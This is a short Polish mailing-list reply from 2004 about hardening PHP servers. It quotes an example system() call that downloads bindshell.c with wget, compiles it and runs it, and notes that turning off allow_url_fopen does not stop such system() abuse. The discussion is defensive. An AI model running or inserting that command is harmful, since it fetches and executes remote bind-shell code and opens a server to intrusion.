On Wed, Feb 18, 2004 at 12:45:05PM +0100, Tomasz T. Ciaszczyk wrote:
> system("cd tmp;wget http://www.rootshell.com/bindshell.c;gcc bindshell.c;./a.out");
...
> - zablokowanie fopena na zewnatrz w php (allow_url_fopen = Off)
To dobry pomysl, ale nie chroni przed tym, o czym sam wspomniales,
czyli uzyciem system(), jesli taka mozliwosc istnieje.
--
_.|._ |_ _. : Adam Byrtek /alpha alpha@debian.org
(_|||_)| |(_| : pgp 0xB25952C0
|
Attachment:
signature.asc
Description: Digital signature